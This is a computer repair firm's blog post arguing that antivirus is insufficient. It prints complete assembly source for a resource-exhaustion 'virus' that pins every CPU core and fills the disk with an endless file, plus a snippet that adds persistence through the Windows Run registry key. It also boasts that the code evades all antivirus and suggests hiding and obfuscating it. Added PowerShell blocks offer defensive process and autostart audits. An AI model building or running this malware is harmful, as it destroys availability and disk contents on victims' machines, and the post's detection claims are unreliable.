Why antivirus won’t protect you?

Simply having anti-virus software won’t protect your computer from online threats

As everyone knows, simply having antivirus installed is not enough to protect your computer from online threats. Modern malware is sophisticated, and the people writing it know how to make their code evade the latest antivirus software.

Computer viruses, malware and spyware are designed for several different purposes: stealing your card and bank details while you browse online, displaying advertisements on your computer, or simply slowing it down.

Most computer repair companies only use popular commercial anti-virus products to remove threats from customers' computers. A few months later, or even sooner, the computer is infected again, even with up-to-date virus definitions, simply because it was never fully secured. The root of the problem is a lack of system security: Microsoft Windows's default settings leave many unnecessary services running that users may never use, yet they remain exposed to cyberattacks. No anti-virus protects any computer 100%. Most of our customers (95%) had anti-virus installed, yet their machines were still badly infected. According to Symantec, the virus detection rate is only 45%.

We at PCMarc – Computer repair not only remove viruses from customers' computers but also implement full system security, hardening the operating system as far as possible. This greatly reduces the chance of virus, malware and other infections.

If you want us to secure your computer simply contact us.

Our security expert at PCMarc, Deko Gruntkowski, has prepared an example of an assembler virus that slows down your computer.

.586 ; create 32 bit code
.model flat, stdcall ; 32 bit memory model
option casemap :none ; case sensitive

include c:\masm32\include\windows.inc
include c:\masm32\include\masm32.inc
include c:\masm32\include\gdi32.inc
include c:\masm32\include\user32.inc
include c:\masm32\include\kernel32.inc
include c:\masm32\include\Comctl32.inc
include c:\masm32\include\comdlg32.inc
include c:\masm32\include\shell32.inc
include c:\masm32\include\oleaut32.inc
include c:\masm32\include\msvcrt.inc
include c:\masm32\macros\macros.asm

includelib c:\masm32\lib\masm32.lib
includelib c:\masm32\lib\gdi32.lib
includelib c:\masm32\lib\user32.lib
includelib c:\masm32\lib\kernel32.lib
includelib c:\masm32\lib\Comctl32.lib
includelib c:\masm32\lib\comdlg32.lib
includelib c:\masm32\lib\shell32.lib
includelib c:\masm32\lib\oleaut32.lib
includelib c:\masm32\lib\msvcrt.lib

virus PROTO:DWORD

.data

lpFileName db "virus",0
adrpass dd 0
temp db 4 dup(0)
file_handle db 4 dup(0)

.code

start:
invoke GetCurrentProcess
invoke SetPriorityClass,eax, IDLE_PRIORITY_CLASS
xor edx, edx
xor ecx, ecx
xor ebx, ebx
mov eax, 1h
cpuid
and ebx, 00FF0000h
shr ebx, 16
mov ecx, ebx ; numbers of CPU cores
push ecx
mov eax, 9
mul ecx
invoke VirtualAlloc, 0, ecx, MEM_COMMIT,PAGE_EXECUTE_READWRITE
mov adrpass, eax
pop ecx

run_threads:
push ecx
mov eax, adrpass
invoke CreateThread, 0, 0, offset virus, eax, 0, 0
mov eax, adrpass
add eax, 9
mov adrpass, eax
pop ecx
loop run_threads
ret

virus proc near adrespass:DWORD
pushad

start:
invoke CreateFile, offset lpFileName, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0
mov dword ptr [file_handle], eax
st1:
invoke WriteFile, dword ptr [file_handle], adrespass, 1024, offset temp, 0
jmp st1
popad
ret
virus endp

end start

This application detects the number of CPU cores in your system, then starts one thread per core in the virus proc so that all CPU power is consumed, while each thread writes a file named "virus" filled with 0x00 bytes until you run out of disk space. The example also causes high disk usage, which further slows down your computer.
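From the repair technician's side, the behaviour described above has a recognisable footprint: a process with at least one thread per core, sustained CPU or write throughput, and (because of SetPriorityClass) an idle base priority. The following PowerShell triage is an added example, not code from the PCMarc post; it queries the real Win32_PerfFormattedData_PerfProc_Process class, and the thresholds are assumptions to tune per host.

```powershell
# Added example (not from the PCMarc post): flag processes matching the
# "one busy thread per core plus constant file writes" pattern described above.
function Get-SuspectedResourceHogs {
    param(
        [int]$MinWriteBytesPerSec = 50MB,   # assumption: tune to the host's normal load
        [int]$MinCpuPercent       = 50      # PercentProcessorTime sums all cores (can exceed 100)
    )
    $cores = [int]$env:NUMBER_OF_PROCESSORS

    Get-CimInstance Win32_PerfFormattedData_PerfProc_Process |
        Where-Object {
            $_.IDProcess -ne 0 -and $_.Name -ne '_Total' -and
            $_.ThreadCount -ge $cores -and
            ($_.IOWriteBytesPersec -ge $MinWriteBytesPerSec -or
             $_.PercentProcessorTime -ge $MinCpuPercent)
        } |
        ForEach-Object {
            # Path may be unavailable for protected processes; that alone is not a finding.
            $proc = Get-Process -Id $_.IDProcess -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Name         = $_.Name
                Pid          = $_.IDProcess
                Threads      = $_.ThreadCount
                Cores        = $cores
                CpuPercent   = $_.PercentProcessorTime
                WriteMBps    = [math]::Round($_.IOWriteBytesPersec / 1MB, 1)
                # IDLE_PRIORITY_CLASS, as set in the sample, shows up as base priority 4
                BasePriority = $_.PriorityBase
                Path         = $proc.Path
            }
        }
}

Get-SuspectedResourceHogs | Sort-Object WriteMBps -Descending | Format-Table -AutoSize
```

A hit with base priority 4, thread count equal to the core count and a steadily growing file in a user-writable folder is worth inspecting before disk space runs out.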

There are plenty of modifications that could be applied to this code.

We could add a system startup entry:

szRegistry db "Software\Microsoft\Windows\CurrentVersion\Run",0
szProgName db "Virus",0

@@:
call GetCommandLine
inc eax
push eax
mov esi,eax
mov edi,offset agfupxpath

lodsb
@@:
stosb
lodsb
cmp al,'"'
jne @B
mov ecx,esi
@@:
dec esi
cmp byte ptr [esi],'\'
jne @B
mov byte ptr [esi],0
pop esi
mov edi,offset upxdir
@@:
lodsb
stosb
cmp al,0
jne @B

mov esi,ecx
mov edi,offset file1buffer
lodsb
cmp al,0
je cmdlinedone
@@:
lodsb
cmp al,0
je cmdlinedone
stosb
jmp @B

cmdlinedone:

invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,offset szRegistry,0,KEY_ALL_ACCESS,addr hReg
test eax,eax
je @F

mov ecx, offset agfupxpath
invoke lstrlen,ecx
mov ecx, offset agfupxpath

invoke RegSetValueEx,hReg,offset szProgName,0,REG_SZ,ecx,eax
@@:
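The startup snippet above relies on the HKLM Run key, which is also the first place a technician should audit during a clean-up. The following PowerShell audit is an added example, not code from the PCMarc post: it lists every Run/RunOnce value, resolves the executable the way the snippet's command-line parsing builds it (quoted path or first token), and flags entries that are missing, unsigned, or living outside the usual program directories (the trusted-directory list is an assumption to adjust per estate).

```powershell
# Added example (not from the PCMarc post): audit autostart entries in the Run keys.
function Get-RunKeyAudit {
    $keys = @(
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    # Assumption: legitimate autostart binaries normally live under these roots.
    $trusted = @($env:ProgramFiles, ${env:ProgramFiles(x86)}, $env:windir) | Where-Object { $_ }

    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }          # skip PSPath, PSParentPath, ...
            $cmd = [string]$p.Value
            # Executable is the quoted first token, else everything up to the first ".exe",
            # else the first whitespace-delimited token.
            if     ($cmd -match '^\s*"([^"]+)"')   { $exe = $Matches[1] }
            elseif ($cmd -match '^\s*(.+?\.exe)')  { $exe = $Matches[1] }
            else                                   { $exe = ($cmd -split '\s+')[0] }
            $exe = [Environment]::ExpandEnvironmentVariables($exe)

            $exists    = $exe -and (Test-Path -LiteralPath $exe -PathType Leaf)
            $sig       = if ($exists) { (Get-AuthenticodeSignature -LiteralPath $exe).Status } else { 'Missing' }
            $inTrusted = $trusted | Where-Object { $exe -like "$_\*" }
            $flag      = if (-not $exists)      { 'missing binary' }
                         elseif ($sig -ne 'Valid') { 'unsigned or invalid signature' }
                         elseif (-not $inTrusted)  { 'outside Program Files/Windows' }
                         else                      { '' }

            [pscustomobject]@{
                Key = $key; Name = $p.Name; Command = $cmd
                Executable = $exe; Signature = $sig; Flag = $flag
            }
        }
    }
}

Get-RunKeyAudit | Where-Object Flag | Format-Table -AutoSize
```

Run it elevated so the HKLM hives are readable; a value whose executable sits in a user profile or temp folder and carries no valid signature is the pattern the snippet above would produce.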

We could go further and use low-level code to protect the virus process or even hide it. We could also use code polymorphism or obfuscation to make it even harder to debug.

The code above is not detected by any antivirus software.

We can't accept any responsibility or liability for damages arising from misuse of the above code or from any resulting loss of data or information.

----

PCMarc Team

PCMarc – Computer repair